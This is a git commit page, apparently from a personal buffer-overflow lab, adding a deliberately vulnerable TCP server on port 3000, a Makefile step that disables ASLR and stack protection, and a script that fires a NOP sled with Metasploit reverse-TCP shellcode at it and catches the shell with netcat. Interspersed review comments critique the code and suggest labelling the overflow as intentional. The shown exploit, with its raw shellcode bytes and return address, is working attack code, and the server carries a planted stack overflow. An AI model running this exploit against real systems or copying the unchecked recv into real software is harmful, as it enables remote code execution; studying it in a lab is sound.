author | toni <matzeton@googlemail.com> | 2014-06-29 20:52:59 +0200 |
---|---|---|
committer | toni <matzeton@googlemail.com> | 2014-06-29 20:52:59 +0200 |
commit | f2371a6b48d7f76fc07564f4e1e4d64e643a897e (patch) | |
tree | 91d7f779092ee6fcbbce773e8742ca90b4717bdc | |
parent | 7b891a0d5e83dd9c3295397e3af5e78ec5d3f410 (diff) |
- makefile improved
- tcp recv() based overrun works
- automatic exploit && shell spawning script
-rw-r--r-- | Makefile | 12 | ||||
-rwxr-xr-x | exploit_tcp.sh | 30 | ||||
-rw-r--r-- | overflow_tcp.c | 40 |
3 files changed, 56 insertions, 26 deletions
@@ -1,13 +1,22 @@
 RM := rm
 CC := gcc
 STRIP := strip
-CFLAGS = -Wall -g3
+CFLAGS = -Wall -g
 OCFLAGS = -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector
 TARGETS = $(patsubst %.c,%.o,$(wildcard *.c))
 all: $(TARGETS) post-build
 post-build:
+	@read -p "disable protection stuff? (y/N) " answ; \
+	if [ "x$$answ" != "xy" ]; then \
+	echo "abort .."; \
+	return 0; \
+	else \
+	./disable_prot.sh; \
+	fi
+
+disable-prot:
 	if [ `cat /proc/sys/kernel/randomize_va_space` -eq 0 ]; then \
 	echo "not necessary to run ./disable_prot.sh"; \
 	else \
@@ -16,7 +25,6 @@ post-build:
 %.o : %.c
 	$(CC) $(CFLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@) $<
-	$(STRIP) $(patsubst %.o,%,$@)
 clean:
 	$(RM) -f $(patsubst %.o,%,$(TARGETS))
diff --git a/exploit_tcp.sh b/exploit_tcp.sh
index 4630887..106489d 100755
--- a/exploit_tcp.sh
+++ b/exploit_tcp.sh
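Review bot: `return 0` in the new `post-build` recipe is not valid outside a shell function; each recipe line runs in `$(SHELL)` (`/bin/sh` unless set), so the abort branch ends with a shell error instead of a clean exit — use `exit 0` there. `read -p` is likewise a bash extension that dash rejects, so either add `SHELL := /bin/bash` or print the prompt with `printf` and use a plain `read answ`. The prompt guards a system-wide change (the `disable-prot` target inspects `/proc/sys/kernel/randomize_va_space`, and `./disable_prot.sh` presumably writes it), so a comment above `post-build:` saying that the setting persists until re-enabled would help whoever runs this on a shared machine.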
@@ -1,11 +1,29 @@ #!/bin/sh -# shellcode generated with metasploit (exec /bin/sh): -# ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' +# shellcode generated with metasploit (reverse tcp shell; use netcat as tcp server): +# ./msfpayload linux/x86/shell_reverse_tcp PrependFork=true AppendExit=true LHOST=127.0.0.1 VERBOSE=true R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' -# 117xNOP (0x90) + shellcode + 117xNOP (0x90) + return addr -#[*] Exact match at offset 284 +# 260 --> 260 - 102 = 158 / 2 = 79 +# 79xNOP (0x90) + shellcode + 79xNOP (0x90) + return addr +echo "starting netcat reverse tcp server .." +screen -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444 +sleep 1 +echo "starting exploitable tcp server .." +./overflow_tcp & +sleep 1 -read -p "Target: " host -python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"' | nc -q 0 "$host" 3000 +host="127.0.0.1" +echo "connecting to $host .." +python -c 'print "\x90"*79 + \ +"\xba\x91\x60\x15\x91\xdb\xd6\xd9\x74\x24\xf4\x5f\x2b\xc9" + \ +"\xb1\x13\x31\x57\x15\x83\xc7\x04\x03\x57\x11\xe2\x64\x51" + \ +"\xce\x66\x65\xc1\xb3\xdb\x03\xe4\xba\x3d\x63\x8e\x71\x3d" + \ +"\x10\x16\x3a\x01\xdb\x29\x73\x07\x1a\x41\xfb\xf7\xdc\x93" + \ +"\x6b\xfa\xdc\x82\x37\x73\x3d\x14\xa1\xd3\xec\x06\x9d\xd7" + \ +"\x87\x48\x2c\x57\xc5\xe2\x80\x77\x9a\x9a\xb6\xa8\x3e\x32" + \ +"\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \ +"\x03\xa2\x22\x81" + \ +"\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000 + +screen -R overcat diff --git a/overflow_tcp.c b/overflow_tcp.c index cafeaec..24af99e 100644 --- a/overflow_tcp.c +++ b/overflow_tcp.c 
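Review bot: `./overflow_tcp &` is started in the background and never stopped, so the deliberately vulnerable listener on port 3000 keeps running after the script finishes; capture its pid (`./overflow_tcp & srv=$!`) and `kill "$srv"` after `screen -R overcat` returns. The detached `overcat` screen session has the same problem if the user detaches instead of exiting. The script also has no `set -e`, so a failed step (`screen` or `nc` missing, for example) falls through silently to the next line.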
@@ -6,19 +6,32 @@
 #include <netinet/in.h>
 #include <string.h>
 #include <unistd.h>
-#include <signal.h>
 #define MAXLINE 1024
 #define BUFLEN 256
 #define SERV_PORT 3000
 #define LISTENQ 8
+
+int exploitable(int fd)
+{
+	int n;
+	char buf[BUFLEN];
+
+	memset(buf, 0, BUFLEN);
+	if (buf[0] == EOF) {
+		return (0);
+	}
+
+	n = recv(fd, buf, MAXLINE, 0);
+	fprintf(stderr, "Received string(%d): %s", n, buf);
+	return (n);
+}
+
 int main (int argc, char **argv)
 {
-	int listenfd, connfd, n, line = 0, status;
-	pid_t childpid, w;
+	int listenfd, connfd, n;
 	socklen_t clilen;
-	char buf[BUFLEN];
 	struct sockaddr_in cliaddr, servaddr;
 	if ((listenfd = socket(AF_INET, SOCK_STREAM, 0)) <0) {
@@ -41,26 +54,17 @@ int main (int argc, char **argv)
 	fprintf(stderr, "Server running on port %d ...\n", SERV_PORT);
 	for (;;) {
-		memset(buf, 0, BUFLEN);
 		clilen = sizeof(cliaddr);
-		connfd = accept (listenfd, (struct sockaddr *) &cliaddr, &clilen);
+		connfd = accept(listenfd, (struct sockaddr *) &cliaddr, &clilen);
 		if (connfd < 0) break;
 		fprintf(stderr, "Client connected.\n");
-		if ((childpid = fork ()) == 0 ) {
-			while ((n = recv(connfd, buf, MAXLINE,0)) > 0) {
-				fprintf(stderr, "[%d] Received string(%d): %s", line, n, buf);
-				memset(buf, 0, BUFLEN);
-				line++;
-			}
-			exit(1);
-		}
-		if ((w = wait(&status))) {
-			if (WIFEXITED(status)) {
-				kill(w, SIGCHLD);
-			}
+		while ((n = exploitable(connfd)) > 0) { }
+		fprintf(stderr, "disconnecting client ..\n");
+		close(connfd);
 	}
+	fprintf(stderr, "shutdown ..\n");
 	close(listenfd);
 	return (0);
 }
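Review bot: The `if (buf[0] == EOF)` guard in `exploitable` is dead code: `memset` has just zeroed `buf` and `EOF` is -1, so the branch can never be taken; drop it or say what it was meant to catch. The out-of-bounds `recv` into `buf` is the point of this file (`BUFLEN` is 256, `MAXLINE` is 1024), but nothing in the code says so — add `/* intentional: recv may write MAXLINE bytes into a BUFLEN-byte buffer */` above the `recv` call so a later reader does not "fix" it by accident. Separately, `"%s"` on `buf` reads until a NUL the received data is not guaranteed to contain; `"%.*s"` with `n` as the precision bounds the read without touching the overflow itself. `n` also narrows `recv`'s `ssize_t` result to `int`.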
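Review bot: With the fork removed, `main` now serves clients one at a time on the accepting process itself, so a message that crashes `exploitable` takes the listener down with it, where the old code lost only the child; if a single-shot target is intended, say so with a comment on the `while ((n = exploitable(connfd)) > 0) { }` line, since that loop is the only place the change is visible. `argc` and `argv` are unused, so `int main(void)` would keep `-Wall` quiet. `main` begins outside this hunk.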